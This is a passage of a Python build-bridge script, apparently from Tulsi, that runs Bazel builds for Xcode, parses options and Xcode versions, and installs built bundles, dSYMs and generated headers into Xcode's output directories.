value = line[len(attribute) + 1:]
self.attributes[attribute] = value
pending_attributes.remove(attribute)
break
for attribute in self._ATTRIBUTES:
if attribute not in self.attributes:
_PrintXcodeError(
'Failed to extract %s from %s.\n' % (attribute, codesign_output))
def Get(self, attribute):
"""Returns the value for the given attribute, or None if it wasn't found."""
value = self.attributes.get(attribute)
if attribute not in self._ATTRIBUTES:
_PrintXcodeError(
'Attribute %s not declared to be parsed. ' % attribute +
'Available attributes are %s.\n' % self._ATTRIBUTES)
return value
class _OptionsParser(object):
"""Handles parsing script options."""
# List of all supported Xcode configurations.
KNOWN_CONFIGS = ['Debug', 'Release']
def __init__(self, build_settings, sdk_version, platform_name, arch):
self.targets = []
self.build_settings = build_settings
self.common_build_options = [
'--verbose_failures',
'--bes_outerr_buffer_size=0', # Don't buffer Bazel output.
]
self.sdk_version = sdk_version
self.platform_name = platform_name
if self.platform_name.startswith('watch'):
config_platform = 'watchos'
elif self.platform_name.startswith('iphone'):
config_platform = 'ios'
elif self.platform_name.startswith('macos'):
config_platform = 'macos'
elif self.platform_name.startswith('appletv'):
config_platform = 'tvos'
else:
self._WarnUnknownPlatform()
config_platform = 'ios'
self.bazel_build_config = '{}_{}'.format(config_platform, arch)
if self.bazel_build_config not in build_settings.platformConfigFlags:
_PrintXcodeError('Unknown active compilation target of "{}". '
'Please report a Tulsi bug.'
.format(self.bazel_build_config))
sys.exit(1)
self.verbose = 0
self.bazel_bin_path = 'bazel-bin'
self.bazel_executable = None
@staticmethod
def _UsageMessage():
"""Returns a usage message string."""
usage = textwrap.dedent("""\
Usage: %s <target> [<target2> ...] --bazel <bazel_binary_path> [options]
Where options are:
--verbose [-v]
Increments the verbosity of the script by one level. This argument
may be provided multiple times to enable additional output levels.
--bazel_bin_path <path>
Path at which Bazel-generated artifacts may be retrieved.
""" % sys.argv[0])
return usage
def ParseOptions(self, args):
"""Parses arguments, returning (message, exit_code)."""
bazel_executable_index = args.index('--bazel')
self.targets = args[:bazel_executable_index]
if not self.targets or len(args) < bazel_executable_index + 2:
return (self._UsageMessage(), 10)
self.bazel_executable = args[bazel_executable_index + 1]
return self._ParseVariableOptions(args[bazel_executable_index + 2:])
def GetBaseFlagsForTargets(self, config):
is_debug = config == 'Debug'
return self.build_settings.flags_for_target(
self.targets[0],
is_debug,
self.bazel_build_config)
def GetEnabledFeatures(self):
"""Returns a list of enabled Bazel features for the active target."""
return self.build_settings.features_for_target(self.targets[0])
def GetBazelOptions(self, config):
"""Returns the full set of build options for the given config."""
bazel, start_up, build = self.GetBaseFlagsForTargets(config)
all_build = []
all_build.extend(self.common_build_options)
all_build.extend(build)
xcode_version_flag = self._ComputeXcodeVersionFlag()
if xcode_version_flag:
all_build.append('--xcode_version=%s' % xcode_version_flag)
return bazel, start_up, all_build
def _WarnUnknownPlatform(self):
_PrintUnbuffered('Warning: unknown platform "%s" will be treated as '
'iOS' % self.platform_name)
def _ParseVariableOptions(self, args):
"""Parses flag-based args, returning (message, exit_code)."""
verbose_re = re.compile('-(v+)$')
while args:
arg = args[0]
args = args[1:]
if arg == '--bazel_bin_path':
if not args:
return ('Missing required parameter for %s' % arg, 2)
self.bazel_bin_path = args[0]
args = args[1:]
elif arg == '--verbose':
self.verbose += 1
else:
match = verbose_re.match(arg)
if match:
self.verbose += len(match.group(1))
else:
return ('Unknown option "%s"\n%s' % (arg, self._UsageMessage()), 1)
return (None, 0)
@staticmethod
def _GetXcodeBuildVersionString():
"""Returns Xcode build version from the environment as a string."""
return os.environ['XCODE_PRODUCT_BUILD_VERSION']
@staticmethod
def _GetXcodeVersionString():
"""Returns Xcode version info from the Xcode's version.plist.
Just reading XCODE_VERSION_ACTUAL from the environment seems like
a more reasonable implementation, but has shown to be unreliable,
at least when using Xcode 11.3.1 and opening the project within an
Xcode workspace.
"""
developer_dir = os.environ['DEVELOPER_DIR']
app_dir = developer_dir.split('.app')[0] + '.app'
version_plist_path = os.path.join(app_dir, 'Contents', 'version.plist')
try:
# python2 API to plistlib - needs updating if/when Tulsi bumps to python3
plist = plistlib.readPlist(version_plist_path)
except IOError:
_PrintXcodeWarning('Tulsi cannot determine Xcode version, error '
'reading from {}'.format(version_plist_path))
return None
try:
# Example: "11.3.1", "11.3", "11.0"
key = 'CFBundleShortVersionString'
version_string = plist[key]
except KeyError:
_PrintXcodeWarning('Tulsi cannot determine Xcode version from {}, no '
'"{}" key'.format(version_plist_path, key))
return None
# But we need to normalize to major.minor.patch, e.g. 11.3.0 or
# 11.0.0, so add one or two ".0" if needed (two just in case
# there is ever just a single version number like "12")
dots_count = version_string.count('.')
dot_zeroes_to_add = 2 - dots_count
version_string += '.0' * dot_zeroes_to_add
return version_string
@staticmethod
def _ComputeXcodeVersionFlag():
"""Returns a string for the --xcode_version build flag, if any.
The flag should be used if the active Xcode version was not the same one
used during project generation.
Note this a best-attempt only; this may not be accurate as Bazel itself
caches the active DEVELOPER_DIR path and the user may have changed their
installed Xcode version.
"""
xcode_version = _OptionsParser._GetXcodeVersionString()
build_version = _OptionsParser._GetXcodeBuildVersionString()
if not xcode_version or not build_version:
return None
# Of the form Major.Minor.Fix.Build (new Bazel form) or Major.Min.Fix (old).
full_bazel_version = os.environ.get('TULSI_XCODE_VERSION')
if not full_bazel_version: # Unexpected: Tulsi gen didn't set the flag.
return xcode_version
# Newer Bazel versions specify the version as Major.Minor.Fix.Build.
if full_bazel_version.count('.') == 3:
components = full_bazel_version.rsplit('.', 1)
bazel_xcode_version = components[0]
bazel_build_version = components[1]
if (xcode_version != bazel_xcode_version
or build_version != bazel_build_version):
return '{}.{}'.format(xcode_version, build_version)
else:
return None
else: # Old version of Bazel. We need to use form Major.Minor.Fix.
return xcode_version if xcode_version != full_bazel_version else None
class BazelBuildBridge(object):
"""Handles invoking Bazel and unpacking generated binaries."""
BUILD_EVENTS_FILE = 'build_events.json'
def __init__(self, build_settings):
self.build_settings = build_settings
self.verbose = 0
self.bazel_bin_path = None
self.codesign_attributes = {}
self.codesigning_folder_path = os.environ['CODESIGNING_FOLDER_PATH']
self.xcode_action = os.environ['ACTION'] # The Xcode build action.
# When invoked as an external build system script, Xcode will set ACTION to
# an empty string.
if not self.xcode_action:
self.xcode_action = 'build'
if int(os.environ['XCODE_VERSION_MAJOR']) < 900:
xcode_build_version = os.environ['XCODE_PRODUCT_BUILD_VERSION']
_PrintXcodeWarning('Tulsi officially supports Xcode 9+. You are using an '
'earlier Xcode, build %s.' % xcode_build_version)
self.tulsi_version = os.environ.get('TULSI_VERSION', 'UNKNOWN')
self.custom_lldbinit = os.environ.get('TULSI_LLDBINIT_FILE')
# TODO(b/69857078): Remove this when wrapped_clang is updated.
self.direct_debug_prefix_map = False
self.normalized_prefix_map = False
self.update_symbol_cache = UpdateSymbolCache()
# Path into which generated artifacts should be copied.
self.built_products_dir = os.environ['BUILT_PRODUCTS_DIR']
# Path where Xcode expects generated sources to be placed.
self.derived_sources_folder_path = os.environ.get('DERIVED_SOURCES_DIR')
# Full name of the target artifact (e.g., "MyApp.app" or "Test.xctest").
self.full_product_name = os.environ['FULL_PRODUCT_NAME']
# Whether to generate runfiles for this target.
self.gen_runfiles = os.environ.get('GENERATE_RUNFILES')
# Target SDK version.
self.sdk_version = os.environ.get('SDK_VERSION')
# TEST_HOST for unit tests.
self.test_host_binary = os.environ.get('TEST_HOST')
# Whether this target is a test or not.
self.is_test = os.environ.get('WRAPPER_EXTENSION') == 'xctest'
# Target platform.
self.platform_name = os.environ['PLATFORM_NAME']
# Type of the target artifact.
self.product_type = os.environ['PRODUCT_TYPE']
# Path to the parent of the xcodeproj bundle.
self.project_dir = os.environ['PROJECT_DIR']
# Path to the xcodeproj bundle.
self.project_file_path = os.environ['PROJECT_FILE_PATH']
# Path to the directory containing the WORKSPACE file.
self.workspace_root = os.path.abspath(os.environ['TULSI_WR'])
# Set to the name of the generated bundle for bundle-type targets, None for
# single file targets (like static libraries).
self.wrapper_name = os.environ.get('WRAPPER_NAME')
self.wrapper_suffix = os.environ.get('WRAPPER_SUFFIX', '')
# Path where Xcode expects the artifacts to be written to. This is not the
# codesigning_path as device vs simulator builds have different signing
# requirements, so Xcode expects different paths to be signed. This is
# mostly apparent on XCUITests where simulator builds set the codesigning
# path to be the .xctest bundle, but for device builds it is actually the
# UI runner app (since it needs to be codesigned to run on the device.) The
# FULL_PRODUCT_NAME variable is a stable path on where to put the expected
# artifacts. For static libraries (objc_library, swift_library),
# FULL_PRODUCT_NAME corresponds to the .a file name, which coincides with
# the expected location for a single artifact output.
# TODO(b/35811023): Check these paths are still valid.
self.artifact_output_path = os.path.join(
os.environ['TARGET_BUILD_DIR'],
os.environ['FULL_PRODUCT_NAME'])
# Path to where Xcode expects the binary to be placed.
self.binary_path = os.path.join(
os.environ['TARGET_BUILD_DIR'], os.environ['EXECUTABLE_PATH'])
self.is_simulator = self.platform_name.endswith('simulator')
# Check to see if code signing actions should be skipped or not.
if self.is_simulator:
self.codesigning_allowed = False
else:
self.codesigning_allowed = os.environ.get('CODE_SIGNING_ALLOWED') == 'YES'
# Target architecture. Must be defined for correct setting of
# the --cpu flag. Note that Xcode will set multiple values in
# ARCHS when building for a Generic Device.
archs = os.environ.get('ARCHS')
if not archs:
_PrintXcodeError('Tulsi requires env variable ARCHS to be '
'set. Please file a bug against Tulsi.')
sys.exit(1)
arch = archs.split()[-1]
if self.is_simulator and arch == "arm64":
self.arch = "sim_" + arch
else:
self.arch = arch
if self.codesigning_allowed:
platform_prefix = 'iOS'
if self.platform_name.startswith('macos'):
platform_prefix = 'macOS'
entitlements_filename = '%sXCTRunner.entitlements' % platform_prefix
self.runner_entitlements_template = os.path.join(self.project_file_path,
'.tulsi',
'Resources',
entitlements_filename)
self.bazel_executable = None
def Run(self, args):
"""Executes a Bazel build based on the environment and given arguments."""
if self.xcode_action != 'build':
sys.stderr.write('Xcode action is %s, ignoring.' % self.xcode_action)
return 0
parser = _OptionsParser(self.build_settings,
self.sdk_version,
self.platform_name,
self.arch)
timer = Timer('Parsing options', 'parsing_options').Start()
message, exit_code = parser.ParseOptions(args[1:])
timer.End()
if exit_code:
_PrintXcodeError('Option parsing failed: %s' % message)
return exit_code
self.verbose = parser.verbose
self.bazel_bin_path = os.path.abspath(parser.bazel_bin_path)
self.bazel_executable = parser.bazel_executable
self.bazel_exec_root = self.build_settings.bazelExecRoot
self.bazel_output_base = self.build_settings.bazelOutputBase
# Update feature flags.
features = parser.GetEnabledFeatures()
self.direct_debug_prefix_map = 'DirectDebugPrefixMap' in features
self.normalized_prefix_map = 'DebugPathNormalization' in features
# Path to the Build Events JSON file uses pid and is removed if the
# build is successful.
filename = '%d_%s' % (os.getpid(), BazelBuildBridge.BUILD_EVENTS_FILE)
self.build_events_file_path = os.path.join(
self.project_file_path,
'.tulsi',
filename)
(command, retval) = self._BuildBazelCommand(parser)
if retval:
return retval
timer = Timer('Running Bazel', 'running_bazel').Start()
exit_code, outputs = self._RunBazelAndPatchOutput(command)
timer.End()
if exit_code:
_Fatal('Bazel build failed with exit code %d. Please check the build '
'log in Report Navigator (⌘9) for more information.'
% exit_code)
return exit_code
post_bazel_timer = Timer('Total Tulsi Post-Bazel time', 'total_post_bazel')
post_bazel_timer.Start()
# This needs to run after `bazel build`, since it depends on the Bazel
# output directories
if not os.path.exists(self.bazel_exec_root):
_Fatal('No Bazel execution root was found at %r. Debugging experience '
'will be compromised. Please report a Tulsi bug.'
% self.bazel_exec_root)
return 404
if not os.path.exists(self.bazel_output_base):
_Fatal('No Bazel output base was found at %r. Editing experience '
'will be compromised for external workspaces. Please report a'
' Tulsi bug.'
% self.bazel_output_base)
return 404
exit_code = self._LinkTulsiToBazel('tulsi-execution-root', self.bazel_exec_root)
if exit_code:
return exit_code
# Old versions of Tulsi mis-referred to the execution root as the workspace.
# We preserve the old symlink name for backwards compatibility.
exit_code = self._LinkTulsiToBazel('tulsi-workspace', self.bazel_exec_root)
if exit_code:
return exit_code
exit_code = self._LinkTulsiToBazel(
'tulsi-output-base', self.bazel_output_base)
if exit_code:
return exit_code
exit_code, outputs_data = self._ExtractAspectOutputsData(outputs)
if exit_code:
return exit_code
# Generated headers are installed on a thread since we are launching
# a separate process to do so. This gives us clean timings.
install_thread = threading.Thread(
target=self._InstallGeneratedHeaders, args=(outputs,))
install_thread.start()
timer = Timer('Installing artifacts', 'installing_artifacts').Start()
exit_code = self._InstallArtifact(outputs_data)
timer.End()
install_thread.join()
if exit_code:
return exit_code
exit_code, dsym_paths = self._InstallDSYMBundles(
self.built_products_dir, outputs_data)
if exit_code:
return exit_code
if not dsym_paths:
# Clean any bundles from a previous build that can interfere with
# debugging in LLDB.
self._CleanExistingDSYMs()
else:
for path in dsym_paths:
# Starting with Xcode 9.x, a plist based remapping exists for dSYM
# bundles that works with Swift as well as (Obj-)C(++).
#
# This solution also works for Xcode 8.x for (Obj-)C(++) but not
# for Swift.
timer = Timer('Adding remappings as plists to dSYM',
'plist_dsym').Start()
exit_code = self._PlistdSYMPaths(path)
timer.End()
if exit_code:
_PrintXcodeError('Remapping dSYMs process returned %i, please '
'report a Tulsi bug and attach a full Xcode '
'build log.' % exit_code)
return exit_code
# Starting with Xcode 7.3, XCTests inject several supporting frameworks
# into the test host that need to be signed with the same identity as
# the host itself.
if (self.is_test and not self.platform_name.startswith('macos') and
self.codesigning_allowed):
exit_code = self._ResignTestArtifacts()
if exit_code:
return exit_code
# Starting with Xcode 8, .lldbinit files are honored during Xcode debugging
# sessions. This allows use of the target.source-map field to remap the
# debug symbol paths encoded in the binary to the paths expected by Xcode.
#
# This will not work with dSYM bundles, or a direct -fdebug-prefix-map from
# the Bazel-built locations to Xcode-visible sources.
timer = Timer('Updating .lldbinit', 'updating_lldbinit').Start()
clear_source_map = dsym_paths or self.direct_debug_prefix_map
exit_code = self._UpdateLLDBInit(clear_source_map)
timer.End()
if exit_code:
_PrintXcodeWarning('Updating .lldbinit action failed with code %d' %
exit_code)
post_bazel_timer.End(log_absolute_times=True)
return 0
def _BuildBazelCommand(self, options):
"""Builds up a commandline string suitable for running Bazel."""
configuration = os.environ['CONFIGURATION']
# Treat the special testrunner build config as a Debug compile.
test_runner_config_prefix = '__TulsiTestRunner_'
if configuration.startswith(test_runner_config_prefix):
configuration = configuration[len(test_runner_config_prefix):]
elif os.environ.get('TULSI_TEST_RUNNER_ONLY') == 'YES':
_PrintXcodeError('Building test targets with configuration "%s" is not '
'allowed. Please use the "Test" action or "Build for" > '
'"Testing" instead.' % configuration)
return (None, 1)
if configuration not in _OptionsParser.KNOWN_CONFIGS:
_PrintXcodeError('Unknown build configuration "%s"' % configuration)
return (None, 1)
bazel, start_up, build = options.GetBazelOptions(configuration)
bazel_command = [bazel]
bazel_command.extend(start_up)
bazel_command.append('build')
bazel_command.extend(build)
bazel_command.extend([
# The following flags are used by Tulsi to identify itself and read
# build information from Bazel. They shold not affect Bazel anaylsis
# caching.
'--tool_tag=tulsi:bazel_build',
'--build_event_json_file=%s' % self.build_events_file_path,
'--noexperimental_build_event_json_file_path_conversion',
'--aspects', '@tulsi//:tulsi/tulsi_aspects.bzl%tulsi_outputs_aspect'])
if self.is_test and self.gen_runfiles:
bazel_command.append('--output_groups=+tulsi_outputs')
else:
bazel_command.append('--output_groups=tulsi_outputs,default')
bazel_command.extend(options.targets)
extra_options = bazel_options.BazelOptions(os.environ)
bazel_command.extend(extra_options.bazel_feature_flags())
return (bazel_command, 0)
def _RunBazelAndPatchOutput(self, command):
"""Runs subprocess command, patching output as it's received."""
self._PrintVerbose('Running "%s", patching output for workspace root at '
'"%s" with project path at "%s".' %
(' '.join([pipes.quote(x) for x in command]),
self.workspace_root,
self.project_dir))
# Clean up bazel output to make it look better in Xcode.
bazel_line_regex = re.compile(
r'(INFO|DEBUG|WARNING|ERROR|FAILED): ([^:]+:\d+:(?:\d+:)?)\s+(.+)')
bazel_generic_regex = re.compile(r'(INFO|DEBUG|WARNING|ERROR|FAILED): (.*)')
def PatchBazelDiagnosticStatements(output_line):
"""Make Bazel output more Xcode friendly."""
def BazelLabelToXcodeLabel(bazel_label):
"""Map Bazel labels to xcode labels for build output."""
xcode_labels = {
'INFO': 'note',
'DEBUG': 'note',
'WARNING': 'warning',
'ERROR': 'error',
'FAILED': 'error'
}
return xcode_labels.get(bazel_label, bazel_label)
match = bazel_line_regex.match(output_line)
if match:
xcode_label = BazelLabelToXcodeLabel(match.group(1))
output_line = '%s %s: %s' % (match.group(2), xcode_label,
match.group(3))
else:
match = bazel_generic_regex.match(output_line)
if match:
xcode_label = BazelLabelToXcodeLabel(match.group(1))
output_line = '%s: %s' % (xcode_label, match.group(2))
return output_line
if self.workspace_root != self.project_dir:
# Match (likely) filename:line_number: lines.
xcode_parsable_line_regex = re.compile(r'([^/][^:]+):\d+:')
def PatchOutputLine(output_line):
output_line = PatchBazelDiagnosticStatements(output_line)
if xcode_parsable_line_regex.match(output_line):
output_line = '%s/%s' % (self.workspace_root, output_line)
return output_line
patch_xcode_parsable_line = PatchOutputLine
else:
patch_xcode_parsable_line = PatchBazelDiagnosticStatements
def HandleOutput(output):
for line in output.splitlines():
_logger.log_bazel_message(patch_xcode_parsable_line(line))
def WatcherUpdate(watcher):
"""Processes any new events in the given watcher.
Args:
watcher: a BazelBuildEventsWatcher object.
Returns:
A list of new tulsiout file names seen.
"""
new_events = watcher.check_for_new_events()
new_outputs = []
for build_event in new_events:
if build_event.stderr:
HandleOutput(build_event.stderr)
if build_event.stdout:
HandleOutput(build_event.stdout)
if build_event.files:
outputs = [x for x in build_event.files if x.endswith('.tulsiouts')]
new_outputs.extend(outputs)
return new_outputs
def ReaderThread(file_handle, out_buffer):
out_buffer.append(file_handle.read())
file_handle.close()
# Make sure the BEP JSON file exists and is empty. We do this to prevent
# any sort of race between the watcher, bazel, and the old file contents.
open(self.build_events_file_path, 'w').close()
# Capture the stderr and stdout from Bazel. We only display it if it we're
# unable to read any BEP events.
process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1)
# Register atexit function to clean up BEP file.
atexit.register(_BEPFileExitCleanup, self.build_events_file_path)
global CLEANUP_BEP_FILE_AT_EXIT
CLEANUP_BEP_FILE_AT_EXIT = True
# Start capturing output from Bazel.
reader_buffer = []
reader_thread = threading.Thread(target=ReaderThread,
args=(process.stdout, reader_buffer))
reader_thread.daemon = True
reader_thread.start()
with io.open(self.build_events_file_path, 'r', -1, 'utf-8', 'ignore'
) as bep_file:
watcher = bazel_build_events.BazelBuildEventsWatcher(bep_file,
_PrintXcodeWarning)
output_locations = []
while process.returncode is None:
output_locations.extend(WatcherUpdate(watcher))
time.sleep(0.1)
process.poll()
output_locations.extend(WatcherUpdate(watcher))
# If BEP JSON parsing failed, we should display the raw stdout and
# stderr from Bazel.
reader_thread.join()
if not watcher.has_read_events():
HandleOutput(reader_buffer[0])
if process.returncode == 0 and not output_locations:
CLEANUP_BEP_FILE_AT_EXIT = False
_PrintXcodeError('Unable to find location of the .tulsiouts file.'
'Please report this as a Tulsi bug, including the'
'contents of %s.' % self.build_events_file_path)
return 1, output_locations
return process.returncode, output_locations
def _ExtractAspectOutputsData(self, output_files):
"""Converts aspect output from paths to json to a list of dictionaries.
Args:
output_files: A list of strings to files representing Bazel aspect output
in UTF-8 JSON format.
Returns:
return_code, [dict]: A tuple with a return code as its first argument and
for its second argument, a list of dictionaries for
each output_file that could be interpreted as valid
JSON, representing the returned Bazel aspect
information.
return_code, None: If an error occurred while converting the list of
files into JSON.
"""
outputs_data = []
for output_file in output_files:
try:
output_data = json.load(open(output_file))
except (ValueError, IOError) as e:
_PrintXcodeError('Failed to load output map ""%s". '
'%s' % (output_file, e))
return 600, None
outputs_data.append(output_data)
return 0, outputs_data
def _InstallArtifact(self, outputs_data):
"""Installs Bazel-generated artifacts into the Xcode output directory."""
xcode_artifact_path = self.artifact_output_path
if not outputs_data:
_PrintXcodeError('Failed to load top level output file.')
return 600
primary_output_data = outputs_data[0]
if 'artifact' not in primary_output_data:
_PrintXcodeError(
'Failed to find an output artifact for target %s in output map %r' %
(xcode_artifact_path, primary_output_data))
return 601
primary_artifact = primary_output_data['artifact']
artifact_archive_root = primary_output_data.get('archive_root')
bundle_name = primary_output_data.get('bundle_name')
# The PRODUCT_NAME used by the Xcode project is not trustable as it may be
# modified by the user and, more importantly, may have been modified by
# Tulsi to disambiguate multiple targets with the same name.
self.bazel_product_name = bundle_name
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = primary_artifact.endswith('.ipa')
is_zip = primary_artifact.endswith('.zip')
if is_ipa or is_zip:
expected_bundle_name = bundle_name + self.wrapper_suffix
# The directory structure within the IPA is then determined based on
# Bazel's package and/or product type.
if is_ipa:
bundle_subpath = os.path.join('Payload', expected_bundle_name)
else:
# If the artifact is a ZIP, assume that the bundle is the top-level
# directory (this is the way in which Skylark rules package artifacts
# that are not standalone IPAs).
bundle_subpath = expected_bundle_name
# Prefer to copy over files from the archive root instead of unzipping the
# ipa/zip in order to help preserve timestamps. Note that the archive root
# is only present for local builds; for remote builds we must extract from
# the zip file.
if self._IsValidArtifactArchiveRoot(artifact_archive_root, bundle_name):
source_location = os.path.join(artifact_archive_root, bundle_subpath)
exit_code = self._RsyncBundle(os.path.basename(primary_artifact),
source_location,
xcode_artifact_path)
else:
exit_code = self._UnpackTarget(primary_artifact,
xcode_artifact_path,
bundle_subpath)
if exit_code:
return exit_code
elif os.path.isfile(primary_artifact):
# Remove the old artifact before copying.
if os.path.isfile(xcode_artifact_path):
try:
os.remove(xcode_artifact_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale output file ""%s". '
'%s' % (xcode_artifact_path, e))
return 600
exit_code = self._CopyFile(os.path.basename(primary_artifact),
primary_artifact,
xcode_artifact_path)
if exit_code:
return exit_code
else:
self._RsyncBundle(os.path.basename(primary_artifact),
primary_artifact,
xcode_artifact_path)
# When the rules output a tree artifact, Tulsi will copy the bundle as is
# into the expected Xcode output location. But because they're copied as
# is from the bazel output, they come with bazel's permissions, which are
# read only. Here we set them to write as well, so Xcode can modify the
# bundle too (for example, for codesigning).
chmod_timer = Timer('Modifying permissions of output bundle',
'bundle_chmod').Start()
self._PrintVerbose('Spawning subprocess to add write permissions to '
'copied bundle...')
process = subprocess.Popen(['chmod', '-R', 'uga+w', xcode_artifact_path])
process.wait()
chmod_timer.End()
# No return code check as this is not an essential operation.
self._InstallEmbeddedBundlesIfNecessary(primary_output_data)
return 0
def _IsValidArtifactArchiveRoot(self, archive_root, bundle_name):
"""Returns true if the archive root is valid for use."""
if not archive_root or not os.path.isdir(archive_root):
return False
# The archive root will not be updated for any remote builds, but will be
# valid for local builds. We detect this by using an implementation detail
# of the rules_apple bundler: archives will always be transformed from
# <name>.unprocessed.zip (locally or remotely) to <name>.archive-root.
#
# Thus if the mod time on the archive root is not greater than the mod
# time on the on the zip, the archive root is not valid. Remote builds
# will end up copying the <name>.unprocessed.zip but not the
# <name>.archive-root, making this a valid temporary solution.
#
# In the future, it would be better to have this handled by the rules;
# until then this should suffice as a work around to improve build times.
unprocessed_zip = os.path.join(os.path.dirname(archive_root),
'%s.unprocessed.zip' % bundle_name)
if not os.path.isfile(unprocessed_zip):
return False
return os.path.getmtime(archive_root) > os.path.getmtime(unprocessed_zip)
def _InstallEmbeddedBundlesIfNecessary(self, output_data):
"""Install embedded bundles next to the current target's output."""
# In order to find and load symbols for the binary installed on device,
# Instruments needs to "see" it in Spotlight index somewhere on the local
# filesystem. This is only needed for on-device instrumentation.
#
# Unfortunatelly, it does not seem to be possible to detect when a build is
# being made for profiling, thus we can't exclude this step for on-device
# non-profiling builds.
if self.is_simulator or ('embedded_bundles' not in output_data):
return
timer = Timer('Installing embedded bundles',
'installing_embedded_bundles').Start()
for bundle_info in output_data['embedded_bundles']:
bundle_name = bundle_info['bundle_name']
bundle_extension = bundle_info['bundle_extension']
full_name = bundle_name + bundle_extension
output_path = os.path.join(self.built_products_dir, full_name)
# TODO(b/68936732): See if copying just the binary (not the whole bundle)
# is enough to make Instruments work.
if self._IsValidArtifactArchiveRoot(bundle_info['archive_root'],
bundle_name):
source_path = os.path.join(bundle_info['archive_root'], full_name)
self._RsyncBundle(full_name, source_path, output_path)
else:
# Try to find the embedded bundle within the installed main bundle.
bundle_path = self._FindEmbeddedBundleInMain(bundle_name,
bundle_extension)
if bundle_path:
self._RsyncBundle(full_name, bundle_path, output_path)
else:
_PrintXcodeWarning('Could not find bundle %s in main bundle. ' %
(full_name) +
'Device-level Instruments debugging will be '
'disabled for this bundle. Please report a '
'Tulsi bug and attach a full Xcode build log.')
timer.End()
# Maps extensions to anticipated subfolders.
_EMBEDDED_BUNDLE_PATHS = {
'.appex': 'PlugIns',
'.framework': 'Frameworks'
}
def _FindEmbeddedBundleInMain(self, bundle_name, bundle_extension):
"""Retrieves the first embedded bundle found within our main bundle."""
main_bundle = os.environ.get('EXECUTABLE_FOLDER_PATH')
if not main_bundle:
return None
main_bundle_path = os.path.join(self.built_products_dir,
main_bundle)
return self._FindEmbeddedBundle(bundle_name,
bundle_extension,
main_bundle_path)
def _FindEmbeddedBundle(self, bundle_name, bundle_extension, bundle_path):
"""Retrieves the first embedded bundle found within this bundle path."""
embedded_subfolder = self._EMBEDDED_BUNDLE_PATHS.get(bundle_extension)
if not embedded_subfolder:
return None
projected_bundle_path = os.path.join(bundle_path,
embedded_subfolder,
bundle_name + bundle_extension)
if os.path.isdir(projected_bundle_path):
return projected_bundle_path
# For frameworks not in the main app bundle, and possibly other executable
# bundle content in the future, we recurse through every .appex in PlugIns
# to find those frameworks.
#
# This won't support frameworks that could potentially have the same name
# but are different between the app and extensions, but we intentionally
# choose not to handle that case. Xcode build system only supports
# uniquely named frameworks, and we shouldn't confuse the dynamic loader
# with frameworks that have the same image names but different content.
appex_root_path = os.path.join(bundle_path, 'PlugIns')
if not os.path.isdir(appex_root_path):
return None
# Find each directory within appex_root_path and attempt to find a bundle.
# If one can't be found, return None.
appex_dirs = os.listdir(appex_root_path)
for appex_dir in appex_dirs:
appex_path = os.path.join(appex_root_path, appex_dir)
path = self._FindEmbeddedBundle(bundle_name,
bundle_extension,
appex_path)
if path:
return path
return None
def _InstallGeneratedHeaders(self, outputs):
"""Invokes install_genfiles.py to install generated Bazel files."""
genfiles_timer = Timer('Installing generated headers',
'installing_generated_headers').Start()
# Resolve the path to the install_genfiles.py script.
# It should be in the same directory as this script.
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'install_genfiles.py')
args = [path, self.bazel_exec_root]
args.extend(outputs)
self._PrintVerbose('Spawning subprocess install_genfiles.py to copy '
'generated files in the background...')
process = subprocess.Popen(args)
process.wait()
genfiles_timer.End()
def _InstallBundle(self, source_path, output_path):
"""Copies the bundle at source_path to output_path."""
if not os.path.isdir(source_path):
return 0, None
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale bundle ""%s". '
'%s' % (output_path, e))
return 700, None
exit_code = self._CopyBundle(os.path.basename(source_path),
source_path,
output_path)
return exit_code, output_path
def _RsyncBundle(self, source_path, full_source_path, output_path):
"""Rsyncs the given bundle to the given expected output path."""
self._PrintVerbose('Rsyncing %s to %s' % (source_path, output_path))
# rsync behavior changes based on presence of a trailing slash.
if not full_source_path.endswith('/'):
full_source_path += '/'
try:
# Use -c to check differences by checksum, -v for verbose,
# and --delete to delete stale files.
# The rest of the flags are the same as -a but without preserving
# timestamps, which is done intentionally so the timestamp will
# only change when the file is changed.
subprocess.check_output(['rsync',
'-vcrlpgoD',
'--delete',
full_source_path,
output_path],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
_PrintXcodeError('Rsync failed. %s' % e)
return 650
return 0
def _CopyBundle(self, source_path, full_source_path, output_path):
"""Copies the given bundle to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
try:
CopyOnWrite(full_source_path, output_path, tree=True)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _CopyFile(self, source_path, full_source_path, output_path):
"""Copies the given file to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
output_path_dir = os.path.dirname(output_path)
if not os.path.exists(output_path_dir):
try:
os.makedirs(output_path_dir)
except OSError as e:
_PrintXcodeError('Failed to create output directory "%s". '
'%s' % (output_path_dir, e))
return 650
try:
CopyOnWrite(full_source_path, output_path)
except OSError as e:
_PrintXcodeError('Copy failed. %s' % e)
return 650
return 0
def _UnpackTarget(self, bundle_path, output_path, bundle_subpath):
"""Unpacks generated bundle into the given expected output path."""
self._PrintVerbose('Unpacking %s to %s' % (bundle_path, output_path))
if not os.path.isfile(bundle_path):
_PrintXcodeError('Generated bundle not found at "%s"' % bundle_path)
return 670
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
_PrintXcodeError('Failed to remove stale output directory ""%s". '
'%s' % (output_path, e))
return 600
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = bundle_path.endswith('.ipa')
with zipfile.ZipFile(bundle_path, 'r') as zf:
for item in zf.infolist():
filename = item.filename
# Support directories do not seem to be needed by the debugger and are
# skipped.
basedir = filename.split(os.sep)[0]
if basedir.endswith('Support') or basedir.endswith('Support2'):
continue
if len(filename) < len(bundle_subpath):
continue
attributes = (item.external_attr >> 16) & 0o777
self._PrintVerbose('Extracting %s (%o)' % (filename, attributes),
level=1)
if not filename.startswith(bundle_subpath):
_PrintXcodeWarning('Mismatched extraction path. Bundle content '
'at "%s" expected to have subpath of "%s"' %
